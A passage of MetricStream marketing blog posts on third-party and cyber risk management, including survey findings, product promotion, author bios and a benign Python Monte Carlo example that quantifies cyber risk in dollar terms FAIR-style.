  • Difficulty in prioritizing, assessing, and managing a large number of partners
  • Lack of resilience against attacks or malware from trusted third parties

An acute lack of visibility into supply chains and the associated risk was also named as a major challenge: 72% of respondents believed that supply chain visibility, including tracking components, sub-assemblies, and final products, was very or critically important. Respondents also cited a lack of communication or coordination between IT security, governance, leadership, and procurement teams.

IT and cybersecurity teams also faced the question of who should perform the risk evaluation.

Currently, more than half (54%) rely on their third-party partners’ own assessments, while 43% hire an outside service.

Get the Full Report: Third-Party Risk: A Turbulent Outlook Survey Report 2022

Register for the Webinar on 22 Feb 2022: What’s Next in CyberRisk? Third-Party Risk: A Turbulent Outlook

Tune in to listen to a team of experts who will review the key findings of the Cyber Risk Alliance report, “Third Party Risk Lurking in the Shadows”, and discuss practical recommendations for actively managing cyber risk.

Power What’s Next by Leveraging CyberGRC SaaS Solutions

Effective management and mitigation of third-party cyber risks requires regular updating of policies and re-examination of procedures, replacement of obsolete tools, periodical review of partnerships, and developing and/or adopting of new frameworks.

Organizations will also need adequate visibility into vendor and third-party activity, seamless collaboration between various teams, and a quick remediation plan in place in the event of a security incident. Digital tools built to assess and mitigate third and fourth-party risk are the way forward for organizations seeking to manage vendor and third-party risks in a streamlined and consistent manner.

MetricStream’s CyberGRC can effectively keep third-party risks in check with the IT Vendor Risk and Third-Party Risk Management solution which provides integrated, real-time visibility into the vendor ecosystem and empowers organizations to gain an in-depth view of risks of both third and fourth-party vendors. Additionally, with the automation of vendor information management, vendor onboarding, continuous monitoring, vendor risk, compliance and control assessments, and risk mitigation, organizations gain a single and simple tool to manage their IT vendor and third-party risks.

Managing and mitigating third-party risks is a continuous and ongoing process. Supply chain, third-party, and vendor cyber risks will keep escalating as organizations continue to be driven by the many benefits that an extended enterprise brings. To stay ahead, organizations will need to amp up their protection to assess, manage, and mitigate risks. Click here to read what else the CISOs had to say about managing and monitoring third-party risk – and contact us to see how MetricStream can help! Request a custom demo now.

This is the second blog in the “CyberSeries: The Power of Resilience” blog series. As CISOs, CIOs, and board members all grapple with the challenge of cyber risk, we bring you what’s next when it comes to effectively measuring, managing, and mitigating risks in today’s complex and volatile environment. Read the first blog on Five Critical Capabilities to Prepare for Effective Cyber Risk Management.


Patricia McParland AVP – Marketing

Pat McParland is AVP of Product Marketing at MetricStream. She is responsible for creating product messaging, product go-to-market plans, and analyzing market trends for MetricStream's cyber compliance and third party risk product lines. Pat has more than 25 years of financial data and technology marketing experience at Fortune 1000 brands as well as startups and has led product and marketing teams at Dow Jones and Dun & Bradstreet. She has a BA from the College of William and Mary and lives in Summit, New Jersey.

 

Five Critical Capabilities for Effective Cyber Risk Management

4 min read

CyberSeries: The Power of Resilience

We’re excited to launch a new blog series, “CyberSeries: The Power of Resilience”. As CISOs, CIOs, and board members all grapple with the challenge of cyber risk, we will focus and connect on how to measure, manage, and mitigate risks in today’s complex and volatile environment.

In our first installment, we cover a key topic: critical capabilities required for preparing for the future to manage cyber risk effectively. Join us on the cyber resilience journey!

Power What’s Next: Five Critical Capabilities to Prepare for Effective Cyber Risk Management

It’s a whole new world for managing cyber risk – and the stakes are higher than ever. According to the Cost of a Data Breach Report 2021 by IBM and the Ponemon Institute, the average cost of a data breach was $4.24 million in 2021, up from $3.86 million in 2020. Even more striking, the average breach cost was $1.07 million higher where remote working was a factor.

As digitization has escalated, cyber adversaries have become increasingly sophisticated and organized to exploit vulnerabilities and carry out damaging attacks. What’s more, the challenges have gotten significantly worse over the past two years as the pandemic brought a tectonic shift in how businesses operate. The sudden shift to remote work beyond office firewalls and enterprise security mechanisms has expanded the attack surface of organizations and made them more vulnerable to breaches.

Industry 4.0 and Cybersecurity

To adapt quickly to the new normal, organizations rushed to adopt Industry 4.0 technologies such as cloud computing, artificial intelligence, and automated bots. While these technologies help automate processes and make them more intuitive, cyber adversaries are also leveraging them for their own objectives, for instance AI-generated phishing emails and botnet attacks.

The digital-first approach will only amplify going forward and the traditional approach of managing cyber risks – identifying, assessing, monitoring, and responding to potential threats to IT infrastructure – is foundational, but no longer enough. Today, adopting a risk-based approach to cyber risk management is a business imperative. That means not just identifying and assessing cyber risks but also prioritizing cyber risks, ensuring continuous controls monitoring, and aligning cybersecurity strategy to the overarching enterprise risk management framework.

5 Critical Capabilities for the Future

So, what are the critical capabilities that organizations need to build cyber resilience and become future-ready? Here are some key considerations and recommendations.

  • Automation

As cyber attacks become increasingly sophisticated, organizations must continuously augment their cyber risk management programs by adopting advanced technologies and automating wherever possible. CISOs and security teams must ensure that the deployed software is not only effective but also simplifies cyber threat identification and mitigation. For instance, manually sifting through past issues to find similar/relevant ones is highly time-consuming and prone to errors. Implementing an AI-based system can not only accelerate the process but also make it more intuitive by enabling security executives to search for past issues based on intent.

  • Cyber Risk Quantification

In Gartner’s 2021 Board of Directors Survey, 88% of boards said they now see cybersecurity as a business risk, not just a technology one. It is at the top of board agendas, and directors are looking to CISOs and CIOs for updates and answers.

That means communicating cyber risk in business terms that make it easy to understand and prioritize risks. Cyber risk metrics, such as detected vulnerabilities and patch response times, intrusion attempts, security incident rates, severity levels, response time, etc., help in risk reporting, but they tend to focus on technical aspects.

Quantifying risk in monetary terms enables CISOs and security teams to better communicate cyber risks and the cybersecurity posture to leadership in business terms all can understand – dollars and cents. Assigning a dollar value to the risks also helps in making well-informed cybersecurity investment decisions.

How can your organization quantify cyber risks? Get the complete CISO’s Guide to Cyber Quantification

  • Creating a Culture of Cybersecurity Awareness

Creating a culture of cybersecurity awareness must be a key part of the overall corporate culture and strategy. Particularly in this post-COVID era where various business functions and units are undergoing rapid digital transformation, organizations must clearly define security-related roles, responsibilities, and accountability as well as conduct training and workshops to enable cyber risk-aware behavior.

  • Managing Third and Fourth-Party Risk

Recent incidents have highlighted how third-party cyber risks have largely been a blind spot for organizations. With the growing reliance on third parties and the amplified digital interconnectedness, the exposure of organizations to third-party cyber risks has grown sharply. A security incident at one organization can quickly spread and paralyze several connected organizations. A cyber risk program is incomplete without a proactive approach to monitoring cyber risks across your extended enterprise – third, fourth, and subsequent parties.

  • Continuous Monitoring

Cyber risk management is a continuous, iterative business process. Organizations must continuously monitor related functions and processes – risk assessments, reporting mechanisms, remediation and mitigation measures, exception management, controls, etc. – to proactively identify gaps or loopholes that might exist and ensure the efficacy of the cyber defense mechanisms.

 

MetricStream Can Help

MetricStream enables organizations to adopt a focused and business-driven approach to managing IT and cyber risks with its IT & Cyber Risk Management software. The product simplifies conducting IT risk assessments, implementing controls, and streamlining mitigation actions.

In addition, AI-based intelligent issue management and advanced cyber risk quantification capabilities, along with advanced analytics and reports, help strengthen cyber resilience with actionable insights. To request a personalized demo, click here.

We look forward to continuing the conversation. How are you powering cyber resilience in your organization? Please comment below!


Patricia McParland AVP – Marketing


 

Driving Innovation through Customer Feedback at MetricStream: A View from the CyberRisk Product Council

3 min read

Introduction

The cyber threat landscape is evolving at an unprecedented pace. Organizations today operate in an extremely hostile digital environment where cyber adversaries are on the constant lookout to exploit any gap or vulnerability. With the exploding number of cyber attacks, no organization can assume that they have an impenetrable cyber defense infrastructure.

What is required is a proactive approach to cyber risk identification and mitigation. So, how can GRC and IT Risk leaders take steps to assess, mitigate and prevent it?

It’s a topic I’m passionate about – and I’m also passionate about customer feedback. Recently we had the opportunity to combine both. Here is some of what we learned in this critical area.

Customer Engagement via CyberRisk Product Council

We had the privilege of hosting our first IT and CyberRisk Product Council last month. It provided a terrific bird’s-eye view into what’s happening with our customers when it comes to IT and cyber risk.

The purpose of the session was to connect customers and MetricStream product leaders in an interactive dialogue around innovation and exploring questions such as: What’s working? What can we do better? What’s happening in your role and what are the challenges? How can we be most effective for you – now and into the future? What’s on the product roadmap?

We heard multiple themes – keep your product easy to use; collaborate across the enterprise; integrate data for visibility – but most of all, help us quantify risk.

Risk quantification is so critical today because it couches risk – especially, but not only, cyber risk -- in business and monetary terms. This helps security teams to better communicate the cyber risk posture to the management and the board in concrete and real terms, thereby unifying the leaders across the company around the value of cybersecurity investments. With better cyber risk insights and visibility, the decision-makers are empowered to prioritize cybersecurity investments and devise practical action plans.

During the council meeting, we discussed the importance of quantification and how to implement it. A large customer on the council has already implemented the FAIR+ model in conjunction with MetricStream’s IT and Cyber Risk solution. FAIR stands for Factor Analysis of Information Risk, a model for quantifying information and operational risk in financial terms; it has been adopted as a standard by The Open Group and is promoted by the FAIR Institute.

Working together with MetricStream, this customer is now able to measure their information and cyber risk in dollar terms. The security team is better equipped to understand, quantify, and communicate their cyber risk posture to their board, as well as monitor their risk on a real-time basis.

We also discussed other product enhancements and shared the IT and cyber risk roadmap to help our customers benefit from AI-based recommendations and much more.

Above all, we had a chance to engage in an authentic conversation about customer needs, challenges, and pain points. While the product council is far from the only time MetricStream communicates with customers (regular engagement and feedback sessions are critical to our mutual success), there is something special about a session dedicated just to product innovation and feedback.

We had an honest, interesting, and exciting conversation about what’s necessary, what’s possible, and what’s next. The session was full of actionable ideas. It’s obvious why cyber risk ranks at the top of the board and C-suite priorities. Not addressing it is unthinkable, yet tackling it also can be overwhelming. We are so grateful to all of our MetricStream customers for their partnership in bringing innovative solutions to the market and extend a special thanks to the council as we all power what’s next.

Are you an IT and Cyber Risk customer who wants to have your voice heard? Please reach out to me directly at jbhowmick@metricstream.com. We’re adding to the council and have another session coming up soon. Have your voice heard!


Joy Bhowmick Senior Vice President, Product Development

Joy Bhowmick is Senior Vice President, Product Development at MetricStream, and has 20+ years of experience in leading institutional, retail, and commercial banking technology initiatives. He has delivered many solutions in Risk Management, Finance, Compliance, Cyber Security and Audit. He is known for his expertise in determining strategic financial direction, leveraging business and technical acumen to generate solutions for complex issues.

He specializes in championing strategic initiatives to deliver effective results, participating in critical decision-making processes while working proactively with cross-functional teams to drive competitive advantage. His mission is to stay committed to cultivating exceptional stakeholder relationships, meeting their needs and expectations at every step. His ability to provide exceptional service, resources, and methods to meet ever-changing objectives and ensure compliance with all regulatory requirements is what makes him the best at what he does.

 


Power What’s Next in IT & Cyber Risk with MetricStream Intelligence and Innovations

3 min read

Introduction

We recently concluded our flagship event, GRC Summit, held on October 19-20 in a hybrid format comprising virtual and in-person engagements.

Now in its ninth year, the summit is the largest gathering of risk professionals, C-suite executives, thought leaders, industry experts, and practitioners, who come together and share their experiences and best practices to navigate today’s complex and rapidly evolving risk and threat landscape.

This year, Anil Kumar, Sr. Director, Product Manager – IT and Cyber Security, MetricStream, and I had the opportunity to walk through the latest innovations in, and planned for, our IT & Cyber Risk products. Here are some of the key points we discussed:

  • Current IT and Cyber Security Challenges

The key challenges organizations face in IT and cyber today include growing supply chain attacks and data breaches, the proliferation of controls and their associated costs, lack of visibility into IT and cyber risk, regulatory compliance, the need to quantify and communicate cyber risk in financial terms, and more. We recommend that organizations implement an integrated, platform-based approach across all programs to ensure consistency and harmonization among processes and functions.

  • Cyber Risk Quantification

We have been working on cyber risk quantification for a long time. Cyber risk quantification, as the name suggests, expresses cyber risks in financial or monetary terms. This quantitative risk assessment method transforms the uncertainty in the technical aspects of threat, vulnerability, and controls into financial language that business leaders and stakeholders can interpret and act upon. Cyber risk quantification enables:

  • CISOs to communicate cyber risk exposure to the board and other executives
  • Leaders to prioritize cyber investments and decisions (whether to accept or mitigate a risk)
  • Organizations to meet regulatory requirements for disclosing cyber risk factors in financial terms

The session goes deeper into techniques for quantifying risk, discrete and probabilistic factor values, and risk quantification models: factor-based hierarchical models, actuarial/insurance models, AI/ML-based models, and more.
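The factor-based, probabilistic quantification described above (and the dollar-terms quantification in the Five Critical Capabilities post and the FAIR customer story in the Product Council post) is easiest to see as a small simulation. The following is an added illustration written for this page; it is not MetricStream product code or FAIR Institute tooling. It uses a simplified FAIR hierarchy (threat event frequency × vulnerability gives loss event frequency; per-event loss magnitude gives annual loss), samples each leaf factor from a three-point range, and compares a scenario before and after a control. The vendor-access scenario, all of its figures, the $120,000 control cost and the use of a triangular distribution in place of BetaPERT are assumptions made for the example.

```python
"""FAIR-style Monte Carlo cyber risk quantification. Added illustration, not
MetricStream product code. Simplified factor hierarchy:
    annual loss ($)      = sum of per-event losses over the loss events in a year
    loss event frequency = threat event frequency x vulnerability
Each leaf factor is a calibrated (low, most likely, high) range rather than a
point value: that is what "probabilistic factor values" means in practice."""
import math
import random
from dataclasses import dataclass


@dataclass(frozen=True)
class Estimate:
    """Three-point estimate, sampled from a triangular distribution (an assumption
    standing in for the BetaPERT curve most FAIR tooling uses)."""
    low: float
    likely: float
    high: float

    def sample(self, rng: random.Random) -> float:
        return rng.triangular(self.low, self.high, self.likely)


@dataclass(frozen=True)
class Scenario:
    name: str
    tef: Estimate             # threat events (attempts) per year
    vulnerability: Estimate   # probability an attempt becomes a loss event, 0..1
    loss_magnitude: Estimate  # dollars lost per loss event


def poisson(rng: random.Random, lam: float) -> int:
    """Loss events in one year at expected rate lam (Knuth's method; a normal
    approximation above lam = 100 keeps the loop short)."""
    if lam <= 0:
        return 0
    if lam > 100:
        return max(0, round(rng.gauss(lam, math.sqrt(lam))))
    threshold, k, p = math.exp(-lam), 0, 1.0
    while True:
        p *= rng.random()
        if p <= threshold:
            return k
        k += 1


def simulate(scenario: Scenario, trials: int = 10_000, seed: int = 7) -> list:
    """One simulated annual loss per trial; the fixed seed makes runs reproducible."""
    rng = random.Random(seed)
    losses = []
    for _ in range(trials):
        vuln = min(1.0, max(0.0, scenario.vulnerability.sample(rng)))
        events = poisson(rng, scenario.tef.sample(rng) * vuln)
        losses.append(sum(scenario.loss_magnitude.sample(rng) for _ in range(events)))
    return losses


def percentile(values, q: float) -> float:
    ordered = sorted(values)
    return ordered[min(len(ordered) - 1, int(q * len(ordered)))]


def summarize(losses, tolerance: float) -> dict:
    """Board-facing figures: expected annual loss (ALE), tail losses, and the
    probability of exceeding the organisation's stated loss tolerance."""
    return {"ale": sum(losses) / len(losses),
            "p90": percentile(losses, 0.90),
            "p99": percentile(losses, 0.99),
            "p_exceed_tolerance": sum(1 for x in losses if x > tolerance) / len(losses)}


def control_value(baseline: Scenario, with_control: Scenario, annual_control_cost: float,
                  tolerance: float = 1_000_000, trials: int = 10_000) -> dict:
    """Compare the scenario before and after a control that moves one factor and
    express the control as expected loss avoided per dollar spent."""
    before = summarize(simulate(baseline, trials), tolerance)
    after = summarize(simulate(with_control, trials), tolerance)
    avoided = before["ale"] - after["ale"]
    return {"before": before, "after": after, "ale_reduction": avoided,
            "roi": avoided / annual_control_cost if annual_control_cost else math.inf}


# Constructed scenario: a vendor holding privileged remote access. Every figure
# below is an illustrative assumption, not survey data.
VENDOR_BASELINE = Scenario("vendor account compromise",
                           tef=Estimate(2, 6, 12),
                           vulnerability=Estimate(0.20, 0.35, 0.50),
                           loss_magnitude=Estimate(50_000, 250_000, 2_000_000))
# Same scenario after MFA plus just-in-time access for the vendor: only the
# vulnerability factor moves; attempt rate and loss per event are unchanged.
VENDOR_WITH_MFA_JIT = Scenario("vendor account compromise (MFA + JIT access)",
                               tef=VENDOR_BASELINE.tef,
                               vulnerability=Estimate(0.02, 0.05, 0.10),
                               loss_magnitude=VENDOR_BASELINE.loss_magnitude)

if __name__ == "__main__":
    result = control_value(VENDOR_BASELINE, VENDOR_WITH_MFA_JIT, annual_control_cost=120_000)
    for label in ("before", "after"):
        s = result[label]
        print(f"{label:6s} ALE ${s['ale']:,.0f}  p90 ${s['p90']:,.0f}  "
              f"p99 ${s['p99']:,.0f}  P(loss > $1M) {s['p_exceed_tolerance']:.0%}")
    print(f"expected loss avoided ${result['ale_reduction']:,.0f}/yr, "
          f"${result['roi']:.1f} avoided per $1 of control spend")
```

The point of the structure is that a control is evaluated by changing only the factor it actually affects (here, vulnerability) and re-running the same simulation, so the resulting reduction in expected annual loss and in the probability of breaching the loss tolerance is attributable to that control alone. Ranked by loss avoided per dollar, competing controls become a prioritized investment list expressed in the board's currency rather than in vulnerability counts.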

  • MetricStream Intelligence

Our products are infused with what we call MetricStream Intelligence – a combination of our AI/ML engine and calculation engine. It sits on top of our federated data model.

If you break down cyber risk management, it is essentially about managing your asset, threat, vulnerability, issue, and control data. This forms the first layer of our federated data model. On top of this layer we have built a platform that enables simplified capture of the data as well as direct exchange via APIs in real time, with reporting and workflow around it.

On top of these layers sits our machine learning model, which supports simulation techniques and statistical analysis alongside machine learning techniques.

In short, the way we approach this is by enabling organizations to not just manage the workflow of risk assessment, but also to do the computation of the risk and take action driven by facts and data.

  • AI-Powered Action Plan Recommendations

Our customers have often highlighted a major challenge: classifying an issue and creating relevant content for it. Our Issue Management System can now assist users in tagging related issues and creating relevant content for an issue. This capability of our AI/ML model has been further enhanced to recommend the actions that should be implemented to mitigate an issue.

  • Future Innovations

Going forward, we plan to bring more AI/ML-based use cases to our customers, including in the area of response recommendation, control rationalization, and more. Stay tuned!

If you missed our product innovation session “Power What's Next in IT & Cyber Risk” at the GRC Summit 2021, you can now watch it at your convenience here. To request a personalized demo, click here.


Joy Bhowmick Senior Vice President, Product Development

Joy Bhowmick is Senior Vice President, Product Development at MetricStream, and has 20+ years of experience in leading institutional, retail, and commercial banking technology initiatives. He has delivered many solutions in Risk Management, Finance, Compliance, Cyber Security and Audit. He is known for his expertise in determining strategic financial direction, leveraging business and technical acumen to generate solutions for complex issues.


 
